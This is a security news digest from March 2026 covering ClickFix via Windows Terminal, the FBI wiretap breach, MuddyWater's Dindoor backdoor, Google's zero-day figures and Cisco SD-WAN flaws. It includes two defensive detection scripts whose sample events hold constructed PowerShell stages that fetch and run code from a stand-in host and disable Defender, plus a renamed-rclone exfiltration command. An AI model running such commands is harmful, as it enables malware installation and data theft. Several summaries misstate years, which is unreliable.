A new ClickFix variant uses Windows Terminal as the place where victims paste and run a malicious command. The technique relies on social engineering rather than a flaw in the terminal application: the user, not an exploit, executes the attacker's payload, so updating Windows Terminal does not mitigate it. Recommended defenses are monitoring for unusual interactive terminal and PowerShell activity, strict access controls, and user awareness of "paste this to fix it" prompts.
2026-03-06 | CSO Online: ClickFix attackers using new tactic to evade detection, says Microsoft
Threat actors are employing a new tactic in ClickFix phishing attacks, as reported by Microsoft. Instead of instructing victims to use the Run dialog, they now direct them to use the Windows + X → I shortcut to open Windows Terminal (wt.exe). Once opened, victims are prompted to paste malicious PowerShell commands via fake CAPTCHA pages or other deceptive prompts that seem routine. This method aims to evade detection and successfully install malware on the victim's system.
2026-03-09 | TechRadar: Microsoft warns ClickFix attacks targeting Windows Terminal to trick users into running malware
Microsoft has issued a warning regarding the evolving ClickFix campaign, which now targets Windows Terminal to trick users into installing Lumma Stealer malware. This campaign, observed since February 2026, involves victims being directed to malicious websites displaying fake security warnings. Unlike previous methods using the Windows Run dialog, attackers now have victims run commands in Windows Terminal that lead to malware installation and exfiltration of sensitive data from compromised systems.
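The six Windows Terminal ClickFix summaries above describe one chain: the victim opens Terminal (Win+X, then I), pastes a hex- or base64-encoded PowerShell command, and presses Enter. A pasted command never appears on a process-creation command line, because it runs inside the interactive PowerShell host; it shows up in PowerShell script-block logging (Event ID 4104), while whatever the stage spawns shows up as a child process. The following added example is mine, not Microsoft's code, and carries no real indicator from the campaign: it decodes hex blobs and -EncodedCommand arguments from both event types and flags the download-and-execute and Defender-tampering primitives the reporting says the stage contains. The keyword list, field names and sample events are constructed assumptions.

```python
"""Triage of pasted ClickFix commands from PowerShell script-block logs (4104)
and process-creation telemetry. Added example; the events are constructed."""
import base64
import re

# Shells a pasted command runs in, and the Windows Terminal processes that own
# the tab the victim pastes into (basenames, compared case-insensitively).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TERMINAL_HOSTS = {"wt.exe", "windowsterminal.exe"}

# Even-length run of 40 or more hex digits that is not part of a longer run.
HEX_BLOB = re.compile(r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){20,})(?![0-9A-Fa-f])")
# -EncodedCommand and its abbreviations take base64 of a UTF-16LE script.
B64_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cradles, evaluation primitives and Defender tampering that the
# reporting says the decoded stage performs. Assumed list; extend as needed.
CRADLE = re.compile(
    r"\b(iex|iwr|invoke-expression|invoke-webrequest|downloadstring|downloadfile"
    r"|frombase64string|set-mppreference|add-mppreference|schtasks|net\.webclient)\b",
    re.I,
)


def decode_blobs(text):
    """Decode every hex blob and -EncodedCommand argument found in text."""
    decoded = [bytes.fromhex(m.group(1)).decode("utf-8", "replace")
               for m in HEX_BLOB.finditer(text)]
    for m in B64_ARG.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
        decoded.append(raw.decode("utf-16-le", "replace"))
    return decoded


def find_cradles(text):
    """Lower-cased primitives present in one layer of text."""
    return {m.group(1).lower() for m in CRADLE.finditer(text)}


def analyze_command(text):
    """Decode the encoded layers of one command and collect primitives from each."""
    decoded = decode_blobs(text)
    in_decoded = set().union(*(find_cradles(layer) for layer in decoded))
    return {"decoded": decoded,
            "in_decoded": sorted(in_decoded),
            "cradles": sorted(find_cradles(text) | in_decoded)}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return {event_id: [reasons]} for events that look like a ClickFix execution.

    'scriptblock' events carry the text PowerShell actually ran (Event ID 4104),
    which is where an interactively pasted command appears; 'process' events
    carry the image, parent and command line of whatever was launched."""
    findings = {}
    for ev in events:
        result = analyze_command(ev.get("text") or ev.get("cmdline") or "")
        reasons = []
        if result["in_decoded"]:
            reasons.append("encoded layer decodes to download/execute primitives: "
                           + ", ".join(result["in_decoded"]))
        elif result["cradles"]:
            reasons.append("command contains download/execute primitives: "
                           + ", ".join(result["cradles"]))
        if (ev.get("type") == "process" and reasons
                and _basename(ev.get("parent", "")) in TERMINAL_HOSTS
                and _basename(ev.get("image", "")) in SHELLS):
            reasons.append("shell launched from Windows Terminal, matching the Win+X, I lure")
        if reasons:
            findings[ev["id"]] = reasons
    return findings


# Constructed stand-ins for the attacker's stage; example.invalid never resolves.
_STAGE = ("iwr http://example.invalid/s -OutFile $env:TEMP\\s.exe; "
          "schtasks /create /tn Upd /tr $env:TEMP\\s.exe /sc onlogon")
HEX_STAGE = _STAGE.encode().hex()
B64_STAGE = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true; iex (iwr http://example.invalid/x)"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"id": 1, "type": "scriptblock", "text": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"id": 2, "type": "scriptblock",
     "text": "$h='" + HEX_STAGE + "';iex([Text.Encoding]::ASCII.GetString([byte[]]"
             "($h -split '(..)' -ne '' | %{[Convert]::ToByte($_,16)})))"},
    {"id": 3, "type": "process",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Program Files\\WindowsApps\\WindowsTerminal\\WindowsTerminal.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + B64_STAGE},
    {"id": 4, "type": "process",  # a normal admin tab: same parent, nothing encoded
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Program Files\\WindowsApps\\WindowsTerminal\\WindowsTerminal.exe",
     "cmdline": "powershell.exe -NoLogo"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS).items():
        print(event_id, "\n  " + "\n  ".join(reasons))
```

Script-block logging has to be enabled (Turn on PowerShell Script Block Logging under Administrative Templates) for event 2 to exist at all; without it, the only trace of the pasted command is PSReadLine's ConsoleHost_history.txt and the children it spawned.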
FBI targeted with ‘suspicious’ activity on its networks
Date: 2026-03-05 | Source: Cyberscoop
The FBI confirmed a suspected cybersecurity incident involving targeted suspicious activity on its networks. While details remain scarce, reports indicate the activity affected a digital system used for surveillance, including foreign warrants and wiretaps. There is speculation about a connection to the Chinese hacking group Salt Typhoon, which exploited U.S. wiretapping systems in 2024. The timing and responsible parties for the recent incident are unclear. The FBI has faced multiple cyber threats in recent years.
2026-03-05 | TechCrunch: FBI investigating hack on its wiretap and surveillance systems: Report
Hackers have breached FBI networks, impacting a system for managing wiretaps and foreign intelligence surveillance warrants. The FBI confirmed it identified and addressed suspicious activities but provided limited details. This incident adds to a series of significant breaches involving U.S. government agencies, including previous attacks by Chinese and Russian hackers on various organizations. The FBI also reported that the Chinese hacking group Salt Typhoon has compromised at least 200 U.S. companies, including major telecom providers.
2026-03-06 | Recorded Future: FBI investigating ‘suspicious activities’ on agency network following February incident
The FBI is investigating a potential cyberattack on its Digital Collection System Network, which supports wiretaps and intelligence collection. The breach was discovered on February 17, following irregular network behavior. The White House, DHS, and NSA are now involved. The FBI reported that threat actors accessed the system via an internet service provider vendor. Although the system is unclassified, it contains sensitive investigative information. The incident is part of a broader trend of breaches affecting federal law enforcement systems.
2026-03-06 | TechRadar: FBI says its investigating claims its systems were compromised - wire taps and search warrants apparently hijacked
The FBI is investigating a cyber-incident affecting its wiretap and surveillance systems, confirming suspicious activity on its internal networks. While specific details were not disclosed, reports indicate that the breach involved systems managing wiretapping and foreign intelligence surveillance warrants. Media speculation points to the Chinese group Salt Typhoon as a potential actor, known for previous high-level cyber-espionage against U.S. telecommunications providers.
2026-03-06 | CSO Online: FBI wiretap system tapped by hackers
The FBI has reported a suspected incident involving unauthorized access to a network managing wiretaps and foreign intelligence surveillance warrants. The agency confirmed it identified and addressed suspicious activities on its networks, utilizing all technical capabilities for response. Concerns arise that this incident may be linked to state-sponsored actors, particularly given previous warnings about attacks from the China-based Ghost ransomware group targeting US organizations.
2026-03-06 | Cyber Security News: FBI Investigates Hack on its Wiretap and Critical Surveillance Systems
The FBI is investigating a breach involving its wiretap and critical surveillance systems, which may have compromised sensitive information. The incident raises concerns about the security of law enforcement tools and the potential for unauthorized access to surveillance data. The FBI has not disclosed specific details about the attack or the extent of the breach, but it emphasizes the importance of safeguarding its systems against cyber threats. Further updates are expected as the investigation continues.
2026-03-07 | Security Affairs: FBI probing intrusion into a system managing sensitive surveillance information
The FBI is investigating suspicious cyber activity on an internal system managing sensitive surveillance data, initiated on February 17, 2026. The unclassified system contains law enforcement sensitive information, including pen register data and personally identifiable information. The FBI confirmed addressing the suspicious activities using technical capabilities but did not disclose further details or identify the attackers, who employed sophisticated techniques, potentially linked to foreign espionage efforts.
2026-03-08 | The Register: FBI is investigating breach that may have hit its wiretapping tools
The FBI is investigating a breach affecting its wiretapping and surveillance systems, identified on February 17. The unclassified system contained sensitive law enforcement information, including personally identifiable information. Reports have linked the breach to China's Salt Typhoon group, known for hacking U.S. telecommunications. In the same roundup: Europol recently dismantled the Tycoon2FA phishing platform, which facilitated extensive phishing attacks, and the LeakBase data marketplace, and LastPass warned users of a phishing campaign mimicking internal emails.
2026-03-09 | TechCrunch: Salt Typhoon is hacking the world’s phone and internet giants — here’s everywhere that’s been hit
Salt Typhoon, a hacking group linked to China, has targeted major telecom and internet companies globally, stealing tens of millions of phone records, including communications of senior U.S. officials. Affected organizations include AT&T, Verizon, CenturyLink, and Viasat. The group has compromised networks in the U.S., Canada, Brazil, and various Asian and European countries, focusing on Cisco routers. The FBI has urged the use of end-to-end encrypted messaging due to the risks posed by these hacks.
HHS updates a free risk tool to help hospitals size up their cybersecurity exposure
Date: 2026-03-05 | Source: Cyberscoop
The Department of Health and Human Services (HHS) released an updated Risk Identification and Site Criticality (RISC) 2.0 Toolkit, which now includes a cybersecurity module. This tool aids healthcare facilities in assessing cybersecurity risks alongside other threats. The module aligns with the NIST Cybersecurity Framework 2.0 and HHS’s performance goals. HHS emphasizes that cyber safety is integral to patient safety, encouraging healthcare organizations to utilize this resource to enhance resilience against cyber threats.
2026-03-06 | Help Net Security: New cyber module strengthens risk planning for health organizations
HHS's Administration for Strategic Preparedness and Response (ASPR) has introduced a new cybersecurity module in the RISC 2.0 Toolkit to aid health organizations in identifying critical gaps and prioritizing risk mitigation investments. Healthcare leaders highlighted cloud threats, quantum computing risks, and attacks on connected products as areas of concern. The module aligns with NIST CSF 2.0 and HHS Cybersecurity Performance Goals, allowing users to assess cyber risks alongside other hazards. RISC 2.0 is a free tool already utilized by over 3,500 health systems.
2026-03-06 | Cybersecurity Dive: HHS adds cybersecurity guidance to healthcare sector self-assessment tool
The HHS released an updated Risk Identification and Site Criticality (RISC) toolkit, incorporating a new cybersecurity module to help healthcare organizations assess their cyber risk and resilience. This tool aligns with the NIST Cybersecurity Framework and HHS Cybersecurity Performance Goals. Over 3,500 organizations are using RISC, which allows for self-assessments and reports on preparedness against cyberattacks and other crises. The update comes amid rising ransomware threats in the healthcare sector.
2026-03-06 | Healthcare Dive: HHS adds cybersecurity guidance to healthcare sector self-assessment tool
The Department of Health and Human Services released an updated Risk Identification and Site Criticality (RISC) toolkit, incorporating new cybersecurity guidance to help healthcare organizations assess risks and strengthen resilience. The toolkit aligns with the NIST Cybersecurity Framework and HHS Cybersecurity Performance Goals. Over 3,500 organizations currently use RISC, which allows for self-assessments to evaluate preparedness against cyberattacks and other crises, addressing vulnerabilities in legacy systems amid rising ransomware threats.
Iran intelligence backdoored US bank, airport, software outfit networks
Date: 2026-03-05 | Source: The Register
An Iranian cyber group linked to the Ministry of Intelligence and Security has infiltrated multiple US organizations, including a bank, software firm, and airport, since February. Researchers from Symantec and Carbon Black discovered a new backdoor named Dindoor, which has also been deployed against Israeli targets. Data exfiltration attempts were made using Rclone. The group typically gains access via phishing or vulnerabilities. Increased cyber activity, including DDoS attacks, has been noted since the onset of hostilities, but no major disruptive attacks have occurred yet.
2026-03-06 | The Hacker News: Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor
Iranian hacking group MuddyWater has targeted U.S. networks, including banks and airports, embedding a new backdoor called Dindoor, leveraging the Deno JavaScript runtime. The campaign began in early February, coinciding with military tensions. Data exfiltration attempts were made using Rclone. A separate Python backdoor, Fakeset, was also found. The Canadian Centre for Cyber Security warns of potential retaliatory attacks against critical infrastructure. Organizations are advised to enhance cybersecurity measures and remain vigilant.
2026-03-06 | Help Net Security: Iran-linked APT targets US critical sectors with new backdoors
An Iran-linked APT group, Seedworm (Symantec's name for MuddyWater), has targeted multiple US organizations since early February 2026, including a bank, an airport, and non-profits, using new backdoors named Dindoor and Fakeset. These backdoors are linked to espionage efforts, with attempts to exfiltrate data to cloud storage. Researchers noted the group's extensive targeting of various organizations and exploitation of multiple CVEs. An exposed VPS revealed insights into Seedworm's operations, showcasing their adaptability and broad operational scope.
2026-03-06 | Infosecurity Magazine: Iran's MuddyWater Hackers Hit US Firms with New 'Dindoor' Backdoor
Iranian hacking group MuddyWater has targeted several US firms, including a bank and an airport, using a new backdoor named 'Dindoor.' Detected by Broadcom's Symantec and Carbon Black, the campaign began in early February. The Dindoor backdoor, leveraging Deno, was found on networks of affected organizations, with attempts to exfiltrate data noted. A Python backdoor called Fakeset was also discovered at the airport. Both backdoors were signed with certificates linked to MuddyWater, indicating ongoing threats to other organizations.
2026-03-06 | Security Affairs: Iran-linked MuddyWater deploys Dindoor malware against U.S. organizations
Iran-linked APT MuddyWater has targeted U.S. organizations since February 2026, deploying a new backdoor named Dindoor across sectors such as banking, airports, and nonprofits. The malware, relying on the Deno runtime, was signed with a certificate linked to “Amy Cherne.” Victims include a U.S. bank and a defense software supplier in Israel. Researchers noted attempts to exfiltrate data using Rclone. The campaign reflects Iran's strategy of using cyber operations for disruption and espionage against perceived adversaries.
2026-03-09 | Hack Read: Iran’s MuddyWater Hackers Target US Firms with New Dindoor Backdoor
Iran's MuddyWater hackers have targeted multiple U.S. organizations since February 2026, employing a new backdoor malware called Dindoor for stealthy access and data collection. The group, linked to Iran's Ministry of Intelligence, uses phishing and social engineering to infiltrate networks, often leveraging stolen credentials and legitimate tools for lateral movement. Despite geopolitical tensions, their operations persist, emphasizing the need for employee training on recognizing cyberattack tactics to mitigate risks.
2026-03-09 | Cybersecurity Dive: State-linked actors targeted US networks in lead-up to Iran war
State-linked actors, including the Iran-linked APT group Seedworm (MuddyWater), have intensified cyberattacks against U.S. networks since late February amid escalating conflict with Iran. Targeted entities include a U.S. bank, a defense software firm, a U.S.-Canadian NGO, and a U.S. airport. Researchers discovered a new backdoor, Dindoor, leveraging Deno for execution. Data exfiltration attempts were made using Rclone. Pro-Iranian hacktivists also claimed responsibility for hacking personal data in Pennsylvania.
2026-03-09 | Cyber Security News: Iran-Linked Hackers Target U.S. Critical Infrastructure Amid Rising Cyber Threat Activity
Iranian APT group Seedworm has been targeting U.S. critical infrastructure since February 2026, following military strikes on Iran. The group, linked to Iran's MOIS, has infiltrated networks of a U.S. bank, airport, and a defense-related software company. New backdoors Dindoor and Fakeset were identified, with attempts to exfiltrate data using Rclone. The UK’s NCSC warns of ongoing cyber capabilities despite domestic disruptions in Iran. Recommendations include enforcing multi-factor authentication and monitoring outbound data transfers.
2026-03-10 | Cybersecurity Dive: US entities face heightened cyber risk related to Iran war
Fitch Ratings warns that the U.S. and Israeli bombing campaign against Iran increases cyber risks for U.S. public finance issuers, with potential attacks from hacktivists and state-sponsored groups targeting critical infrastructure. Vulnerable sectors include 28 health organizations and 13 energy companies. The Islamic Revolutionary Guard Corps has previously targeted U.S. water utilities. The current conflict has heightened threats, with actors like MuddyWater already positioned on U.S. networks.
2026-03-10 | The Register: Cybercrime isn't just a cover for Iran's government goons - it's a key part of their operations
Iranian government-backed operatives, particularly linked to the Ministry of Intelligence and Security (MOIS), are increasingly utilizing cybercrime tools, including malware and ransomware, to further state objectives. Check Point Research highlights connections between groups like MuddyWater and Void Manticore with criminal organizations. Recent activities include the use of the Rhadamanthys infostealer in phishing campaigns targeting Israeli entities and a new backdoor, DinDoor, in espionage operations. The report emphasizes the obfuscation tactics employed by these groups, complicating attribution efforts.
2026-03-11 | Rapid7: Iran’s Cyber Playbook in the Escalating Regional Conflict
Iran's cyber activities have intensified amid escalating regional conflict, with increased hacktivist mobilization, phishing campaigns, and data theft claims. Key Iranian APT groups, including MuddyWater and APT35, are targeting U.S. and allied interests, employing tactics like DDoS attacks and website defacements. Critical infrastructure is particularly vulnerable, with claims of intrusions into energy sectors. Organizations should monitor for phishing attempts, unusual authentication patterns, and reconnaissance activities to bolster defenses.
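Several of the MuddyWater summaries above report the same two artifacts: data staged for exfiltration with Rclone to cloud storage, and the Dindoor backdoor running on the Deno runtime. Both are legitimate, signed tools, so the useful detection is behavioural rather than a hash. The added example below is mine, not Symantec's or any published detection: it correlates process-creation records with per-host outbound byte counts, recognises Rclone by its verbs, flags and remote:path syntax even when the binary has been renamed, flags Deno executing a script from a temp directory or URL with broad permissions, and raises the priority of a host that also pushed a large volume to a known storage provider. Field names, the storage-domain list, the 500 MB threshold and every record are constructed assumptions; this is one way to act on the page's advice to monitor outbound data transfers.

```python
"""Behavioural detection for Rclone exfiltration and Deno-hosted backdoors over
constructed process and connection records. Added example; tune every list."""
import re
from collections import defaultdict

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "lsf", "serve", "rcd", "mount"}
RCLONE_FLAGS = {"--config", "--transfers", "--bwlimit", "--no-check-certificate",
                "--ignore-existing", "--drive-chunk-size", "--s3-upload-cutoff", "-P", "--progress"}
# remote:path as rclone writes it. A single letter before ':' is a drive letter
# and ':' followed by a slash is a URL scheme, so neither matches.
REMOTE_RE = re.compile(r"(?<![\w:\\/.$])([A-Za-z0-9_-]{2,}):(?![\\/])")
DENO_PERMS = {"-A", "--allow-all", "--allow-net", "--allow-run", "--allow-read", "--allow-write"}
TEMP_HINTS = ("\\temp\\", "\\appdata\\local\\", "/tmp/", "/var/tmp/", "/dev/shm/")
# Providers worth baselining; assumed list, noisy without a per-host allow-list.
STORAGE_DOMAINS = ("mega.co.nz", "mega.nz", "dropbox.com", "dropboxapi.com",
                   "backblazeb2.com", "amazonaws.com")
BYTES_THRESHOLD = 500 * 1024 * 1024  # assumption: 500 MB per host per day


def basename(path):
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify_process(ev):
    """Reasons a process record looks like Rclone exfil or a Deno-hosted implant."""
    argv = ev["cmdline"].split()
    image = basename(ev["image"])
    reasons = []
    has_remote = REMOTE_RE.search(ev["cmdline"]) is not None
    rclone_like = (any(a in RCLONE_VERBS for a in argv[1:])
                   and (any(a in RCLONE_FLAGS for a in argv) or has_remote))
    if image == "rclone":
        reasons.append("rclone executed" + (" against a remote" if has_remote else ""))
    elif rclone_like:
        reasons.append(f"rclone-style command line under a renamed binary ({image})")
    if image == "deno" and "run" in argv:
        script = argv[-1].lower()
        broad = any(a in DENO_PERMS or a.startswith("--allow-") for a in argv)
        odd_source = script.startswith(("http://", "https://")) or any(h in script for h in TEMP_HINTS)
        if broad and odd_source:
            reasons.append("deno runs a script from a temp path or URL with broad permissions")
    return reasons


def storage_bytes_by_host(conns):
    """Sum outbound bytes per host to the storage providers above."""
    totals = defaultdict(int)
    for c in conns:
        dst = c["dst"].lower()
        if any(dst == d or dst.endswith("." + d) for d in STORAGE_DOMAINS):
            totals[c["host"]] += c["bytes_out"]
    return dict(totals)


def correlate(process_events, conns):
    """{host: {'process': [...], 'exfil_bytes': n, 'priority': 'high'|'medium'}}.
    A host with both a suspicious process and a large storage upload is 'high'."""
    alerts = {}
    for ev in process_events:
        reasons = classify_process(ev)
        if reasons:
            alerts.setdefault(ev["host"], {"process": [], "exfil_bytes": 0})["process"] += reasons
    for host, total in storage_bytes_by_host(conns).items():
        if total >= BYTES_THRESHOLD:
            alerts.setdefault(host, {"process": [], "exfil_bytes": 0})["exfil_bytes"] = total
    for alert in alerts.values():
        alert["priority"] = "high" if alert["process"] and alert["exfil_bytes"] else "medium"
    return alerts


# Constructed records: a renamed rclone plus Deno on fs01, rclone on a dev box,
# and an ordinary robocopy backup that must not fire.
PROCESS_EVENTS = [
    {"host": "fs01", "image": "C:\\ProgramData\\svchost.exe",
     "cmdline": "svchost.exe copy D:\\Shares\\Finance mega:fin --transfers 16 --config C:\\ProgramData\\r.conf"},
    {"host": "fs01", "image": "C:\\Users\\svc\\AppData\\Local\\deno.exe",
     "cmdline": "deno.exe run -A --no-prompt C:\\Users\\svc\\AppData\\Local\\Temp\\u.js"},
    {"host": "dev02", "image": "/usr/local/bin/rclone",
     "cmdline": "rclone sync /home/dev/photos gdrive:photos"},
    {"host": "web01", "image": "C:\\Windows\\System32\\robocopy.exe",
     "cmdline": "robocopy D:\\Shares \\\\bkp01\\Shares /MIR"},
]
CONNECTIONS = [
    {"host": "fs01", "dst": "g.api.mega.co.nz", "bytes_out": 2_400_000_000},
    {"host": "fs01", "dst": "updates.example.com", "bytes_out": 50_000_000},
    {"host": "dev02", "dst": "content.dropboxapi.com", "bytes_out": 120_000_000},
    {"host": "web01", "dst": "cdn.example.com", "bytes_out": 900_000_000},
]

if __name__ == "__main__":
    for host, alert in correlate(PROCESS_EVENTS, CONNECTIONS).items():
        print(host, alert["priority"], alert["process"], alert["exfil_bytes"])
```

On a file server Rclone has no business at all, so the rename rule alone is enough there; on developer machines the network leg is what separates a photo backup from the staging the reporting describes.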
Google says 90 zero-days exploited in 2025 as commercial vendor activity grows
Date: 2026-03-05 | Source: Recorded Future
In 2025, Google tracked 90 exploited zero-day vulnerabilities, up from 78 in 2024. Of these, 42 were attributed to commercial surveillance vendors and state-sponsored groups, particularly from China and Russia. Notable vulnerabilities included CVE-2025-21590 and CVE-2025-0282. The report highlights a concerning trend of commercial vendors creating exploit chains and the increasing accessibility of zero-day exploits. U.S. agencies warned about vulnerabilities in security tools from companies like Ivanti and Cisco, emphasizing the need for improved security on edge devices.
2026-03-05 | TechCrunch: Google says half of all zero-days it tracked in 2025 targeted buggy enterprise tech
In 2025, Google reported that 48% of tracked zero-day vulnerabilities targeted enterprise technologies, a record high. Key affected vendors included Cisco, Fortinet, Ivanti, and VMWare, with common flaws like input validation exploited to breach defenses. Notably, the Clop gang compromised Oracle E-Business Suite, affecting organizations like Harvard and The Washington Post. The report also indicated a rise in zero-days attributed to surveillance vendors, reflecting a shift in government hacking tool access.
2026-03-05 | The Register: Google says spyware makers and China-linked groups dominated zero-day attacks last year
In 2025, Google tracked 90 zero-day vulnerabilities, with 43 targeting enterprise software, marking a rise in exploitation by China-linked cyber-espionage groups. Security and networking devices were most affected, with 21 enterprise-related zero-days. Notably, commercial surveillance vendors (CSVs) accounted for 15 zero-days, surpassing traditional state-sponsored groups. Microsoft had the highest number of exploited zero-days, followed by Google and Apple. The report highlights a shift towards targeting larger organizations for espionage.
2026-03-06 | CSO Online: Zero-day exploits hit enterprises faster and harder
In 2023, Google identified 90 zero-day vulnerabilities, with Chinese cyberespionage groups doubling their exploits. Commercial surveillance vendors surpassed state-sponsored hackers in targeting. Nearly half of the zero-days affected enterprise technologies, including security appliances, VPNs, and software platforms. The Google Threat Intelligence Group noted a critical risk from trusted edge infrastructure and highlighted the increasing exploitation of interconnected enterprise software, which accounted for 48% of zero-days last year.
2026-03-06 | Security Affairs: Google GTIG: 90 zero-day flaws exploited in 2025 as enterprise targets grow
Google's GTIG reported 90 zero-day vulnerabilities exploited in 2025, an increase from 78 in 2024, with 48% targeting enterprise technologies. Operating systems were the most exploited, with 39 flaws, while browser exploits fell below 10%. Commercial surveillance vendors surpassed state-sponsored groups in zero-day usage. Major tech vendors and security companies were frequent targets. Google anticipates AI will enhance both threat actor capabilities and defensive measures in 2026.
2026-03-06 | DIGIT: Enterprise Tech Facing Record Zero-Day Pressure, Finds Google
Enterprise tech firms faced significant zero-day exploit pressure in 2025, with 50% of the 90 tracked exploits targeting them. Microsoft was the most affected, with 25 zero-days, followed by Google (11) and Apple (8). Security applications and networking software were primary targets, with 23% of exploits aimed at these systems. Notably, commercial spyware vendors led zero-day attacks, surpassing state-sponsored groups, with 15 exploits linked to them compared to 12 attributed to state actors.
2026-03-06 | Infosecurity Magazine: Zero-Day Attacks on Enterprise Software Reach Record High, Google Warns
On March 5, Google Threat Intelligence Group reported 90 zero-day vulnerabilities exploited in 2025 (up from 78 in 2024 but down from 100 in 2023), with a record-high share aimed at enterprise software: 43 (48%) of these targeted enterprise software and appliances, indicating a shift in attacker focus. Among these, 21 targeted security and networking solutions, which give attackers a path to broad unauthorized access and are often overlooked by defenders. This trend highlights the increasing exploitation of enterprise infrastructure by cyber attackers.
2026-03-06 | Cybersecurity Dive: Nearly half of exploited zero-day flaws target enterprise-grade technology
In 2025, 90 zero-day vulnerabilities were exploited, with nearly half targeting enterprise-grade technology, according to Google Threat Intelligence Group. State-sponsored groups, particularly China-nexus actors, were responsible for at least 10 zero-days, including CVE-2025-21590 affecting Juniper MX routers. Notably, commercial surveillance vendors were involved in over one-third of attacks, surpassing state-sponsored groups. The report highlights AI's growing role in accelerating threat activities and vulnerability exploitation.
2026-03-06 | TechRadar: Google reveals huge number of zero-days patched in 2025, says worse may be to come as 'AI changes the game'
Google's Threat Intelligence Team reported tracking 90 zero-day vulnerabilities exploited in 2025, a decrease from 100 in 2023 but an increase from 78 in 2024. The report indicates a significant rise in enterprise-targeted exploits, which accounted for 48% of all zero-days. AI is expected to enhance both attack and defense capabilities, with attackers automating processes. Google advises defenders to prepare for inevitable compromises and suggests proactive measures for identifying and patching vulnerabilities.
Cisco Catalyst SD-WAN Vulnerabilities Allow Attackers to Gain Root Access
Date: 2026-03-05 | Source: Cyber Security News
Cisco issued a security advisory regarding multiple vulnerabilities in Cisco Catalyst SD-WAN Manager that could allow attackers to bypass authentication and gain root access. Key vulnerabilities include CVE-2026-20129, a critical flaw with a CVSS score of 9.8, and CVE-2026-20126, which allows privilege escalation. Active exploitation of CVE-2026-20122 and CVE-2026-20128 has been reported. Immediate software upgrades to versions 20.9.8.2, 20.12.5.3, or 20.18.2.1 are recommended, with no workarounds available.
2026-03-05 | Help Net Security: Cisco warns of SD-WAN Manager exploitation, fixes 48 firewall vulnerabilities
Cisco has confirmed exploitation of two vulnerabilities in Catalyst SD-WAN Manager (CVE-2026-20128 and CVE-2026-20122) patched in February 2025. CVE-2026-20128 allows local attackers with valid credentials to gain DCA user privileges, while CVE-2026-20122 enables remote attackers to overwrite files and gain vmanage user privileges. Cisco recommends upgrading to fixed software. Additionally, 48 vulnerabilities were fixed in Cisco Secure Firewall, including two critical flaws (CVE-2026-20079 and CVE-2026-20131).
2026-03-05 | The Hacker News: Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities
Cisco has confirmed active exploitation of two vulnerabilities in Catalyst SD-WAN Manager: CVE-2026-20122 (CVSS 7.1), allowing authenticated attackers to overwrite files, and CVE-2026-20128 (CVSS 5.5), enabling local attackers to gain DCA user privileges. Patches were released for various versions. Users are urged to update software, secure appliances, disable unnecessary services, change default passwords, and monitor log traffic. This follows a recent disclosure of a critical flaw (CVE-2026-20127, CVSS 10.0) exploited by a sophisticated actor.
2026-03-06 | The Register: Cisco warns of two more SD-WAN bugs under active attack
Cisco has reported active exploitation of two vulnerabilities in its Catalyst SD-WAN Manager software: CVE-2026-20122 (CVSS 7.1) allows authenticated remote attackers to overwrite files, while CVE-2026-20128 (CVSS 5.5) enables local attackers to gain Data Collection Agent privileges. Cisco urges customers to upgrade to fixed software releases. This warning follows prior alerts about vulnerabilities CVE-2022-20775 and CVE-2026-20127, which are also under active attack by sophisticated threat actors.
2026-03-06 | Security Affairs: Cisco flags ongoing exploitation of two recently patched Catalyst SD-WAN flaws
Cisco warns of active exploitation of two recently patched Catalyst SD-WAN vulnerabilities, CVE-2026-20128 and CVE-2026-20122. These flaws allow attackers to gain root privileges and access sensitive information. Security patches were released on February 25, 2026. The vulnerabilities affect all Cisco Catalyst SD-WAN deployments. Cisco advises immediate updates to mitigate risks. The exploitation is linked to a sophisticated threat actor, tracked as UAT-8616, active since at least 2023.
Workers reviewing Meta Ray-Ban footage encounter users’ intimate moments
Date: 2026-03-05 | Source: Help Net Security
A joint investigation revealed that human contractors in Kenya review footage from Meta's Ray-Ban smart glasses, exposing sensitive personal moments, including intimate activities and bank details. Workers reported seeing unblurred faces in some recordings, raising privacy concerns. Meta's response to inquiries about data handling was vague, and employees in eyewear stores lacked knowledge about the glasses' data practices, potentially misleading customers about privacy risks.
2026-03-05 | The Register: UK watchdog eyes Meta's smart glasses after workers say they 'see everything'
Britain's ICO is investigating Meta's AI-powered smart glasses after reports that contractors reviewing footage captured private moments of users. The investigation, prompted by Swedish media, revealed that workers in Nairobi reviewed videos showing intimate scenes and personal information. The ICO expressed concern over data protection compliance under GDPR, emphasizing the need for transparency in data collection and usage. Meta stated that recordings are used to improve AI systems and can be managed by users.
2026-03-06 | Times Now: Meta Faces Privacy Lawsuit After Swedish Investigation Found Overseas Workers Viewed Users' Intimate Footage
Meta is facing a lawsuit filed on March 4, 2023, in the U.S. after a Swedish investigation revealed that overseas subcontractor workers may have accessed user-recorded footage from Meta's Ray-Ban smart glasses. The findings raise significant privacy concerns regarding how these recordings are handled and whether users were adequately informed about the potential review of their intimate footage.
2026-03-06 | DIGIT: Meta Smart Glasses Under Scrutiny After Intimate Footage is Shared
